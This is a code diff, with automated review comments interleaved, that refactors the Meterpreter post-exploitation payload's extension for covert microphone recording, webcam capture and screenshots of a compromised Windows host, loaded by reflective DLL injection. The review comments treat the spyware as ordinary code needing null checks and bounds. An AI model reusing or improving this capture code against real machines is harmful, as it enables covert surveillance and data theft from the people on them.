diff --git a/c/meterpreter/source/extensions/espia/audio.c b/c/meterpreter/source/extensions/espia/audio.c index 126b59d1..051bfd45 100644 --- a/c/meterpreter/source/extensions/espia/audio.c +++ b/c/meterpreter/source/extensions/espia/audio.c @@ -1,5 +1,5 @@ #define _CRT_SECURE_NO_DEPRECATE 1 -#include "../../common/common.h" +#include "common.h" #include <stdio.h> #include <windows.h> #include <tchar.h> @@ -7,6 +7,7 @@ #include <stdlib.h> #include <malloc.h> #include "espia.h" +#include "common_metapi.h" #pragma comment(lib, "vfw32.lib") #pragma comment(lib, "winmm.lib") @@ -60,6 +61,7 @@ BOOL capmicaudio(char* szFile, int millisecs) return (0L); } +// TODO: remove this junk? int __declspec(dllexport) controlmic(char **waveresults, int msecs) { DWORD dwError = 0; char *wavestring = NULL; @@ -80,24 +82,24 @@ int __declspec(dllexport) controlmic(char **waveresults, int msecs) { /* * Grabs the audio from mic. */ -DWORD request_audio_get_dev_audio(Remote *remote, Packet *packet) +DWORD request_audio_get_dev_audio(Remote* remote, Packet* packet) { - Packet *response = packet_create_response(packet); - DWORD res = ERROR_SUCCESS; - char *wave = NULL; + Packet* response = met_api->packet.create_response(packet); + DWORD res = ERROR_SUCCESS; + char* wave = NULL; - if (controlmic(&wave,packet_get_tlv_value_uint(packet, TLV_TYPE_DEV_RECTIME))) - { - res = GetLastError(); - } + if (controlmic(&wave, met_api->packet.get_tlv_value_uint(packet, TLV_TYPE_DEV_RECTIME))) + { + res = GetLastError(); + } - //packet_add_tlv_string(response, TLV_TYPE_DEV_AUDIO, wave); + //met_api->packet.add_tlv_string(response, TLV_TYPE_DEV_AUDIO, wave); - packet_transmit_response(res, remote, response); + met_api->packet.transmit_response(res, remote, response); - if (wave) - free(wave); + if (wave) + free(wave); - return res; + return res; } diff --git a/c/meterpreter/source/extensions/espia/espia.c b/c/meterpreter/source/extensions/espia/espia.c index ba5d81e1..c5e8a454 100644 
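Review bot: The added `// TODO: remove this junk?` above `controlmic` does not say what would make the function removable or what currently blocks removing it, so nobody can act on it later. The next hunk shows `controlmic` is still called by `request_audio_get_dev_audio`, and it is exported with `__declspec(dllexport)`. A more useful comment would be `// TODO: controlmic appears to be used only by request_audio_get_dev_audio; drop the dllexport and make it static once no external caller is confirmed`. The same applies to the `// TODO: remove this junk?!` added above `controlcam` in video.c. The body of `controlmic` continues outside the hunk.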
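Review bot: In `request_audio_get_dev_audio`, the `TLV_TYPE_DEV_RECTIME` value is read through `get_tlv_value_uint` and passed straight into `controlmic`'s `int msecs` parameter, with no upper bound on the requested duration. If the value is unsigned, as the accessor name suggests, anything above `INT_MAX` becomes negative. Reading it into a local and rejecting out-of-range values makes the conversion explicit: `UINT ms = met_api->packet.get_tlv_value_uint(packet, TLV_TYPE_DEV_RECTIME);` followed by `if (ms > MAX_RECTIME_MS) res = ERROR_INVALID_PARAMETER;`, where `MAX_RECTIME_MS` is a placeholder limit the project would have to define. Separately, `res = GetLastError()` can still be `ERROR_SUCCESS` if the failing path inside `controlmic` (body not shown in this hunk) did not set the last error. In that case a failed capture would be reported as success.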
--- a/c/meterpreter/source/extensions/espia/espia.c +++ b/c/meterpreter/source/extensions/espia/espia.c @@ -2,23 +2,21 @@ * This module implemenet webcam frae capture and mic recording features. */ #define _CRT_SECURE_NO_DEPRECATE 1 -#include "../../common/common.h" +#include "common.h" +#include "common_metapi.h" #include "espia.h" #include "audio.h" #include "video.h" #include "screen.h" -#include "../../DelayLoadMetSrv/DelayLoadMetSrv.h" +// Required so that use of the API works. +MetApi* met_api = NULL; + // include the Reflectiveloader() function, we end up linking back to the metsrv.dll's Init function // but this doesnt matter as we wont ever call DLL_METASPLOIT_ATTACH as that is only used by the // second stage reflective dll inject payload and not the metsrv itself when it loads extensions. #include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" -// NOTE: _CRT_SECURE_NO_WARNINGS has been added to Configuration->C/C++->Preprocessor->Preprocessor - -// this sets the delay load hook function, see DelayLoadMetSrv.h -EnableDelayLoadMetSrv(); - Command customCommands[] = { COMMAND_REQ( "espia_video_get_dev_image", request_video_get_dev_image ), @@ -32,11 +30,11 @@ Command customCommands[] = * @param remote Pointer to the remote instance. * @return Indication of success or failure. */ -DWORD __declspec(dllexport) InitServerExtension(Remote *remote) +DWORD __declspec(dllexport) InitServerExtension(MetApi* api, Remote *remote) { - hMetSrv = remote->met_srv; + met_api = api; - command_register_all( customCommands ); + met_api->command.register_all( customCommands ); return ERROR_SUCCESS; } @@ -48,7 +46,7 @@ DWORD __declspec(dllexport) InitServerExtension(Remote *remote) */ DWORD __declspec(dllexport) DeinitServerExtension(Remote *remote) { - command_deregister_all( customCommands ); + met_api->command.deregister_all( customCommands ); return ERROR_SUCCESS; } 
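Review bot: `InitServerExtension` assigns `api` to the global `met_api` and dereferences it on the next statement without a NULL check, and `DeinitServerExtension` in the following hunk dereferences `met_api` even if initialisation never ran. A guard such as `if (api == NULL) return ERROR_INVALID_PARAMETER;` before the assignment, and `if (met_api == NULL) return ERROR_SUCCESS;` in the deinit path, would turn a crash in the host process into an error return. The doc comment above the function still lists only `@param remote`; add `@param api Pointer to the MetApi function table used by this extension.` Because the exported signature changed, a loader built for the old one-argument form would pass its `Remote*` in the `api` slot, so the loader and the extension need to be updated together.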
diff --git a/c/meterpreter/source/extensions/espia/screen.c b/c/meterpreter/source/extensions/espia/screen.c index c606a820..98d6d4fe 100644 --- a/c/meterpreter/source/extensions/espia/screen.c +++ b/c/meterpreter/source/extensions/espia/screen.c @@ -1,5 +1,5 @@ #define _CRT_SECURE_NO_DEPRECATE 1 -#include "../../common/common.h" +#include "common.h" #include <stdio.h> #include <windows.h> #include <tchar.h> @@ -9,6 +9,7 @@ #include <wingdi.h> #include "espia.h" #include "screen.h" +#include "common_metapi.h" /* Function modified to store bitmap in memory. et [ ] metasploit.com @@ -827,7 +828,6 @@ int convert_bmp_and_send(HBITMAP hBmp, HDC hDC, Packet *resp){ memcpy(buf+sizeof(BITMAPFILEHEADER),(LPVOID) pbih, sizeof(BITMAPINFOHEADER)+ pbih->biClrUsed * sizeof (RGBQUAD)); memcpy(buf+sizeof(BITMAPFILEHEADER)+ (sizeof(BITMAPINFOHEADER)+ pbih->biClrUsed * sizeof (RGBQUAD)),(LPSTR) hp, (int) cb); // Don't send it yet. Convert it to a JPEG. - //packet_add_tlv_raw(resp, TLV_TYPE_DEV_SCREEN, buf, s); // JPEG conversion start here..' @@ -875,7 +875,7 @@ int convert_bmp_and_send(HBITMAP hBmp, HDC hDC, Packet *resp){ (*src_mgr->finish_input) (&cinfo, src_mgr); jpeg_finish_compress(&cinfo); jpeg_destroy_compress(&cinfo); - packet_add_tlv_raw(resp, TLV_TYPE_DEV_SCREEN, buf_jpeg, buf_jpeg_size); + met_api->packet.add_tlv_raw(resp, TLV_TYPE_DEV_SCREEN, buf_jpeg, buf_jpeg_size); // Is it safe to free this right after pack_add_tlv_raw? free(buf_jpeg); @@ -896,7 +896,7 @@ int convert_bmp_and_send(HBITMAP hBmp, HDC hDC, Packet *resp){ */ DWORD request_image_get_dev_screen(Remote *remote, Packet *packet) { - Packet *response = packet_create_response(packet); + Packet *response = met_api->packet.create_response(packet); DWORD dwResult = ERROR_ACCESS_DENIED; HWINSTA hWindowStation = NULL; HWINSTA hOrigWindowStation = NULL; 
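Review bot: In `convert_bmp_and_send`, the result of `met_api->packet.add_tlv_raw(...)` is discarded, so the function cannot tell its caller that the JPEG never made it into the response. Capturing it with `DWORD rc = met_api->packet.add_tlv_raw(resp, TLV_TYPE_DEV_SCREEN, buf_jpeg, buf_jpeg_size);` and propagating a failure would fix that, assuming the call returns a Win32 status (its declaration is not in this diff). The context comment `// Is it safe to free this right after pack_add_tlv_raw?` is left open by the change. Once it is confirmed that `add_tlv_raw` copies the buffer, replace the question with a statement of that ownership rule. The function starts and ends outside the hunk.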
@@ -1045,7 +1045,7 @@ DWORD request_image_get_dev_screen(Remote *remote, Packet *packet) if (hInputDesktop) CloseDesktop(hInputDesktop); - packet_transmit_response(dwResult, remote, response); + met_api->packet.transmit_response(dwResult, remote, response); return dwResult; } diff --git a/c/meterpreter/source/extensions/espia/video.c b/c/meterpreter/source/extensions/espia/video.c index 5631530e..397279e6 100644 --- a/c/meterpreter/source/extensions/espia/video.c +++ b/c/meterpreter/source/extensions/espia/video.c @@ -1,4 +1,4 @@ -#include "../../common/common.h" +#include "common.h" #include <stdio.h> #include <windows.h> #include <psapi.h> @@ -9,6 +9,7 @@ #include <malloc.h> #include <vfw.h> #include "espia.h" +#include "common_metapi.h" #pragma comment(lib, "vfw32.lib") @@ -73,6 +74,7 @@ char *StringCombine(char *string1, char *string2) { return string1; } +// TODO: remove this junk?! int __declspec(dllexport) controlcam(char **imageresults) { DWORD dwError = 0; char *imagestring = NULL; @@ -104,11 +106,11 @@ int __declspec(dllexport) controlcam(char **imageresults) { /* * Grabs the Webcam Image. */ -DWORD request_video_get_dev_image(Remote *remote, Packet *packet) +DWORD request_video_get_dev_image(Remote* remote, Packet* packet) { - Packet *response = packet_create_response(packet); + Packet* response = met_api->packet.create_response(packet); DWORD res = ERROR_SUCCESS; - char *image = NULL; + char* image = NULL; do { @@ -118,14 +120,14 @@ DWORD request_video_get_dev_image(Remote *remote, Packet *packet) break; } - //packet_add_tlv_string(response, TLV_TYPE_DEV_IMAGE, image); + //met_api->packet.add_tlv_string(response, TLV_TYPE_DEV_IMAGE, image); } while (0); - packet_transmit_response(res, remote, response); + met_api->packet.transmit_response(res, remote, response); if (image) - free(image); + free(image); return res; } \ No newline at end of file 
diff --git a/c/meterpreter/source/extensions/priv/server/priv.c b/c/meterpreter/source/extensions/priv/server/priv.c index d6173105..03e196ec 100644 --- a/c/meterpreter/source/extensions/priv/server/priv.c +++ b/c/meterpreter/source/extensions/priv/server/priv.c @@ -2,8 +2,7 @@ * @brief This module implements privilege escalation features. */ #include "precomp.h" -#include "common_metapi.h" - +#include "common_metapi.h" // Required so that use of the API works. MetApi* met_api = NULL; diff --git a/c/meterpreter/workspace/ext_server_espia/ext_server_espia.vcxproj b/c/meterpreter/workspace/ext_server_espia/ext_server_espia.vcxproj index 74cb4d19..aa2671e2 100644 --- a/c/meterpreter/workspace/ext_server_espia/ext_server_espia.vcxproj +++ b/c/meterpreter/workspace/ext_server_espia/ext_server_espia.vcxproj @@ -86,7 +86,7 @@ <Optimization>MinSpace</Optimization> <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion> <IntrinsicFunctions>false</IntrinsicFunctions> - <AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\espia;..\..\source\jpeg-8;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories> + <AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\espia;..\..\source\jpeg-8;..\..\source\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories> <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_ESPIA_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions> <StringPooling>true</StringPooling> <RuntimeLibrary>MultiThreaded</RuntimeLibrary> 
@@ -138,7 +138,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <Optimization>MinSpace</Optimization> <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion> <IntrinsicFunctions>false</IntrinsicFunctions> - <AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\espia;..\..\source\jpeg-8;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories> + <AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\espia;..\..\source\jpeg-8;..\..\source\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories> <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_ESPIA_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions> <StringPooling>true</StringPooling> <RuntimeLibrary>MultiThreaded</RuntimeLibrary> @@ -193,7 +193,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <Optimization>MaxSpeed</Optimization> <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion> <IntrinsicFunctions>false</IntrinsicFunctions> - <AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\espia;..\..\source\jpeg-8;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories> + <AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\espia;..\..\source\jpeg-8;..\..\source\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories> <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_ESPIA_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions> <StringPooling>true</StringPooling> <RuntimeLibrary>MultiThreaded</RuntimeLibrary> 
@@ -245,7 +245,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <Optimization>MaxSpeed</Optimization> <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion> <IntrinsicFunctions>false</IntrinsicFunctions> - <AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\espia;..\..\source\jpeg-8;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories> + <AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\espia;..\..\source\jpeg-8;..\..\source\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories> <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_ESPIA_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions> <StringPooling>true</StringPooling> <RuntimeLibrary>MultiThreaded</RuntimeLibrary>